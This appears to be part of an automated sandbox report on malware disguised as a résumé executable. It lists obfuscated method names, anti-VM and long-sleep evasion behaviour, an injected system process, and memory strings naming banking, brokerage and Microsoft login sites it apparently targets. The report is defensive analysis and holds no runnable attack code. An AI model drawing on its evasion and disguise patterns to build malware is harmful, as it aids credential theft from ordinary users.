            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, J9gH0fkhRdxeGx8H0l.csHigh entropy of concatenated method names: 'wl8Ga3f4fx', 'fGVGDOrcwj', 'RuWG75cpIu', 'VNL74GxkhL', 'Mxm7zgTx0n', 'BQMGrAB1kI', 'v38GyWqnT4', 'yO0Gdpdd4M', 'QEPGIrhFrN', 'Q92GEetj1b'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, iKVRBkmAjnMyg3lECg.csHigh entropy of concatenated method names: 'WHZSKv33HH', 'rxmSoHL0pR', 'v0QD6WdPPO', 'S1oDjUJGvo', 'K5DDvq62xJ', 'AChDMsHPNu', 'rACDk0wbhs', 'gH3Dx9wCp2', 'nO4DbEXWU3', 'XHdDCS2cjw'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, BRrrodyIpfJ2i78iZBd.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Hn0ln9m4HA', 'SotluUO4Cl', 'qp8lpSAfZx', 'eQal3diHfl', 'CADlQjkRdJ', 'JYml9gGv0N', 'yAAlTdUp1W'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, OQYqIHzI2WrTnxnHF2.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'RMULF0mU4s', 'A34LqTvXiH', 'fLVLOIZS3R', 'mTHLfVCpC7', 't4HL8opncR', 'urCLLmLqBE', 'YBWLlN1u43'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, BMWTCqVkjukBjFQf7X.csHigh entropy of concatenated method names: 'do4FPvEYXY', 'MT1FNbX2Pa', 'CSdFUaD4VR', 'NwcFc5oLr6', 'LmdFjsXHjo', 'LQaFv354TU', 'vusFkleL2G', 'FIAFxqycP6', 'pYlFCP0xcd', 'beDFhOsONA'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, OxYXTBPtl3LAaaTJsD.csHigh entropy of concatenated method names: 'qiEsnNLmos', 'OUjsuFLZuX', 'b16spA17UN', 'bE9s3a0CBS', 'xxssQgf7aa', 'mkqs9BL4Bu', 'qPasT3T539', 'UGlswgNXJb', 'hKAs2aCofv', 'uUYs4UVpW8'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, pwXeAKdFbkBqalm4Og.csHigh entropy of concatenated method names: 'rqKWmOsK6', 'upE1ygRjY', 'jDoZBVfO4', 'KuEoNuI4J', 'rlSNHXgf0', 'fShmaoHPl', 'KGcATmuYCWNneoNnPo', 'k7bkS21gHyNXXJB4kF', 'n6C8vaNZP', 'X2alTMvUf'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, Qas3xdyra6RNyrO1vfP.csHigh entropy of concatenated method names: 'DjgLJokA79', 'KAFLiZAiJF', 'NlZLWidMy4', 'zxRL1vKMm4', 'H6oLKUm9Wg', 'x0jLZbMEhB', 'G5yLoBFpQ7', 'vtDLPH3bPm', 'rFALN0Q1MV', 'KUGLmZG6lC'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, i9NUHTnq1v8MTGavnG.csHigh entropy of concatenated method names: 'pZtqCRU0PN', 'r3DqBR737p', 'iHFqnn1uBt', 'lrMquytBk2', 'PejqcV4wIQ', 'w7Lq64LmAp', 'Bu4qj9yT6R', 'Bt2qvqpkk8', 'VfWqMFTyUL', 'hH1qkDao7f'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, Hpb6sX0m5OuPGE34GK.csHigh entropy of concatenated method names: 's7KIR3bgyQ', 'fYXIacOyoF', 'HjfIst1RPh', 'mFEIDHBaiC', 'kF1ISjR86X', 'yGlI7QU7V0', 'uTcIGuKmkg', 'A1nI0jJwwf', 'K5PIYIRLvH', 'IiAIHOK4Cd'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.8e70000.6.raw.unpack, DvFq1CsmOfeYK5xheQ.csHigh entropy of concatenated method names: 'Dispose', 'HRNy2iNtIV', 'PWjdcZemIV', 'N1o55Jw110', 'QJKy4Q2Y9R', 'USIyzgGWTN', 'ProcessDialogKey', 'qRadrqlC8u', 'B7YdyhPRjb', 'avXdder5UV'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, YcnmxKNTnXA1NqQ4lc.csHigh entropy of concatenated method names: 'EDWD1NTw1o', 'u2vDZ6gOco', 'lmTDPwdoZ0', 'pF0DNQ5L9i', 'hCXDq9XnKA', 'GnWDO96N1n', 'wnMDfMbr5G', 'GJdD8X72nq', 'GINDLuNH1Q', 't9aDlRjyx1'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, fqlC8u2Z7YhPRjbrvX.csHigh entropy of concatenated method names: 'VkR8Us0dH1', 'N9q8cVQqQU', 'wOQ86dNNm2', 's0W8jKATyK', 'MD68nPWiFE', 'WFE8v0kDB5', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, xKQ2Y9wRQSIgGWTNfR.csHigh entropy of concatenated method names: 'KRN8axy1PY', 'a0Q8sdrS68', 'CHG8Dj9Vj4', 'YwY8SCAULe', 'zUM87YOl7e', 'wKv8G6VhTo', 'csn80X7GJv', 'bpn8YE4VRu', 'kBt8HgXJSM', 'rgc8e5otpt'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, qy5p5LUNIfQKmew1rq.csHigh entropy of concatenated method names: 'UXE7RO8d2c', 'A3g7sRQ1Or', 'S1P7SidSsw', 'x5i7G0e7Xm', 'dGl70x1nRS', 'ndYSQ22rrc', 'LsDS9b0BKH', 'XnYSTmQfMO', 'YPISwKqnLn', 'ztTS2vOWpw'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, qy1pqrEQ3sOEpt1qlE.csHigh entropy of concatenated method names: 'B3hyGxYXTB', 'xl3y0LAaaT', 'ATnyHXA1Nq', 'U4lyecSKVR', 'TlEyqCg8y5', 'S5LyONIfQK', 'KxOSUlpr0nrZV1sMRG', 'y85Ev9KhoPIn0pGxYK', 'aNuyyayrWo', 'LqwyIVfEmw'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, MJyjJtbGp98wUACFmA.csHigh entropy of concatenated method names: 'AM9GJmwIui', 'bc0GiIMXIQ', 'rNgGWrYPop', 'eZIG1DWdDp', 'udIGKVlbnD', 'Jw5GZFwG0r', 'zE5GoYbYhG', 'E5TGPKTFZX', 'GQXGN0n35L', 'kkxGmgZvdf'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, UvteRy33KIyyiyhRJn.csHigh entropy of concatenated method names: 'r75fH9rJNN', 'ugsfeYPthf', 'ToString', 'mfrfaMc9aR', 'iGSfsce0uN', 'WxXfDSBndn', 'K1afSF3Qli', 'NgZf71WTmu', 'shHfG2XTkI', 'jAYf0Oaejm'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, FAn5GI9Cb4yvKhVofj.csHigh entropy of concatenated method names: 'OyWfwDcRQ5', 'rbmf4djM1O', 'KW38rvDUlg', 'ANM8ysFOTl', 'G84fhD97tn', 'JMZfBZh3YQ', 'RwNfVcexTW', 'iFkfnjRgEy', 'TbKfumM9D0', 'otsfppi0Ab'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, nr5UVF4misg4mgdUAT.csHigh entropy of concatenated method names: 'hf6LyS7T2Z', 'OGKLImP2eA', 'JKALEiY1jx', 'b3wLaj6bU7', 'nAwLshJicE', 'An5LShjABT', 'yBfL73trGI', 'qpN8T93O82', 'Hyg8wjPDgr', 'eay82UlxUR'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, J9gH0fkhRdxeGx8H0l.csHigh entropy of concatenated method names: 'wl8Ga3f4fx', 'fGVGDOrcwj', 'RuWG75cpIu', 'VNL74GxkhL', 'Mxm7zgTx0n', 'BQMGrAB1kI', 'v38GyWqnT4', 'yO0Gdpdd4M', 'QEPGIrhFrN', 'Q92GEetj1b'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, iKVRBkmAjnMyg3lECg.csHigh entropy of concatenated method names: 'WHZSKv33HH', 'rxmSoHL0pR', 'v0QD6WdPPO', 'S1oDjUJGvo', 'K5DDvq62xJ', 'AChDMsHPNu', 'rACDk0wbhs', 'gH3Dx9wCp2', 'nO4DbEXWU3', 'XHdDCS2cjw'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, BRrrodyIpfJ2i78iZBd.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Hn0ln9m4HA', 'SotluUO4Cl', 'qp8lpSAfZx', 'eQal3diHfl', 'CADlQjkRdJ', 'JYml9gGv0N', 'yAAlTdUp1W'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, OQYqIHzI2WrTnxnHF2.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'RMULF0mU4s', 'A34LqTvXiH', 'fLVLOIZS3R', 'mTHLfVCpC7', 't4HL8opncR', 'urCLLmLqBE', 'YBWLlN1u43'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, BMWTCqVkjukBjFQf7X.csHigh entropy of concatenated method names: 'do4FPvEYXY', 'MT1FNbX2Pa', 'CSdFUaD4VR', 'NwcFc5oLr6', 'LmdFjsXHjo', 'LQaFv354TU', 'vusFkleL2G', 'FIAFxqycP6', 'pYlFCP0xcd', 'beDFhOsONA'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, OxYXTBPtl3LAaaTJsD.csHigh entropy of concatenated method names: 'qiEsnNLmos', 'OUjsuFLZuX', 'b16spA17UN', 'bE9s3a0CBS', 'xxssQgf7aa', 'mkqs9BL4Bu', 'qPasT3T539', 'UGlswgNXJb', 'hKAs2aCofv', 'uUYs4UVpW8'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, pwXeAKdFbkBqalm4Og.csHigh entropy of concatenated method names: 'rqKWmOsK6', 'upE1ygRjY', 'jDoZBVfO4', 'KuEoNuI4J', 'rlSNHXgf0', 'fShmaoHPl', 'KGcATmuYCWNneoNnPo', 'k7bkS21gHyNXXJB4kF', 'n6C8vaNZP', 'X2alTMvUf'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, Qas3xdyra6RNyrO1vfP.csHigh entropy of concatenated method names: 'DjgLJokA79', 'KAFLiZAiJF', 'NlZLWidMy4', 'zxRL1vKMm4', 'H6oLKUm9Wg', 'x0jLZbMEhB', 'G5yLoBFpQ7', 'vtDLPH3bPm', 'rFALN0Q1MV', 'KUGLmZG6lC'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, i9NUHTnq1v8MTGavnG.csHigh entropy of concatenated method names: 'pZtqCRU0PN', 'r3DqBR737p', 'iHFqnn1uBt', 'lrMquytBk2', 'PejqcV4wIQ', 'w7Lq64LmAp', 'Bu4qj9yT6R', 'Bt2qvqpkk8', 'VfWqMFTyUL', 'hH1qkDao7f'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, Hpb6sX0m5OuPGE34GK.csHigh entropy of concatenated method names: 's7KIR3bgyQ', 'fYXIacOyoF', 'HjfIst1RPh', 'mFEIDHBaiC', 'kF1ISjR86X', 'yGlI7QU7V0', 'uTcIGuKmkg', 'A1nI0jJwwf', 'K5PIYIRLvH', 'IiAIHOK4Cd'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, DvFq1CsmOfeYK5xheQ.csHigh entropy of concatenated method names: 'Dispose', 'HRNy2iNtIV', 'PWjdcZemIV', 'N1o55Jw110', 'QJKy4Q2Y9R', 'USIyzgGWTN', 'ProcessDialogKey', 'qRadrqlC8u', 'B7YdyhPRjb', 'avXdder5UV'
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: Curriculum Vitae Catalina Munoz.exe PID: 4048, type: MEMORYSTR
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeMemory allocated: 2BE0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeMemory allocated: 2DF0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeMemory allocated: 2BE0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeMemory allocated: 9000000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeMemory allocated: A000000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeMemory allocated: A210000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeMemory allocated: B210000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0153096E rdtsc 2_2_0153096E
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeThread delayed: delay time: 240000Jump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeThread delayed: delay time: 239875Jump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeThread delayed: delay time: 239765Jump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeThread delayed: delay time: 239656Jump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeThread delayed: delay time: 239547Jump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeThread delayed: delay time: 239437Jump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeThread delayed: delay time: 239328Jump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeThread delayed: delay time: 239173Jump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeWindow / User API: threadDelayed 578Jump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeWindow / User API: threadDelayed 614Jump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeWindow / User API: threadDelayed 9813Jump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\TSTheme.exeAPI coverage: 2.8 %
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe TID: 5108Thread sleep time: -7378697629483816s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe TID: 5108Thread sleep time: -240000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe TID: 6216Thread sleep count: 578 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe TID: 5108Thread sleep time: -239875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe TID: 6216Thread sleep count: 614 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe TID: 5108Thread sleep time: -239765s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe TID: 5108Thread sleep time: -239656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe TID: 5108Thread sleep time: -239547s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe TID: 5108Thread sleep time: -239437s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe TID: 5108Thread sleep time: -239328s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe TID: 5108Thread sleep time: -239173s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exe TID: 7548Thread sleep count: 158 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exe TID: 7548Thread sleep time: -316000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exe TID: 7548Thread sleep count: 9813 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exe TID: 7548Thread sleep time: -19626000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe TID: 7604Thread sleep time: -75000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe TID: 7604Thread sleep count: 39 > 30Jump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe TID: 7604Thread sleep time: -58500s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe TID: 7604Thread sleep count: 41 > 30Jump to behavior
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe TID: 7604Thread sleep time: -41000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\TSTheme.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\TSTheme.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_02FDBE90 FindFirstFileW,FindNextFileW,FindClose,15_2_02FDBE90
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeThread delayed: delay time: 240000Jump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeThread delayed: delay time: 239875Jump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeThread delayed: delay time: 239765Jump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeThread delayed: delay time: 239656Jump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeThread delayed: delay time: 239547Jump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeThread delayed: delay time: 239437Jump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeThread delayed: delay time: 239328Jump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeThread delayed: delay time: 239173Jump to behavior
            Source: 63u1Q-P.15.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
            Source: 63u1Q-P.15.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
            Source: 63u1Q-P.15.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
            Source: 63u1Q-P.15.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
            Source: 63u1Q-P.15.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
            Source: 63u1Q-P.15.drBinary or memory string: outlook.office.comVMware20,11696492231s
            Source: 63u1Q-P.15.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
            Source: 63u1Q-P.15.drBinary or memory string: AMC password management pageVMware20,11696492231
            Source: 63u1Q-P.15.drBinary or memory string: interactivebrokers.comVMware20,11696492231
            Source: 63u1Q-P.15.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
            Source: 63u1Q-P.15.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
            Source: 63u1Q-P.15.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
            Source: 63u1Q-P.15.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
            Source: 63u1Q-P.15.drBinary or memory string: outlook.office365.comVMware20,11696492231t
            Source: 63u1Q-P.15.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
            Source: 63u1Q-P.15.drBinary or memory string: discord.comVMware20,11696492231f
            Source: firefox.exe, 00000012.00000002.1765095376.000001EDF2BFC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 63u1Q-P.15.drBinary or memory string: global block list test formVMware20,11696492231
            Source: OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3661826954.000000000061F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:
            Source: 63u1Q-P.15.drBinary or memory string: dev.azure.comVMware20,11696492231j
            Source: 63u1Q-P.15.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
            Source: 63u1Q-P.15.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
            Source: 63u1Q-P.15.drBinary or memory string: bankofamerica.comVMware20,11696492231x
            Source: 63u1Q-P.15.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
            Source: 63u1Q-P.15.drBinary or memory string: tasks.office.comVMware20,11696492231o
            Source: 63u1Q-P.15.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
            Source: 63u1Q-P.15.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
            Source: 63u1Q-P.15.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
            Source: 63u1Q-P.15.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
            Source: 63u1Q-P.15.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
            Source: 63u1Q-P.15.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
            Source: 63u1Q-P.15.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
            Source: 63u1Q-P.15.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
            Source: TSTheme.exe, 0000000F.00000002.3660319790.00000000034E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllw%R[
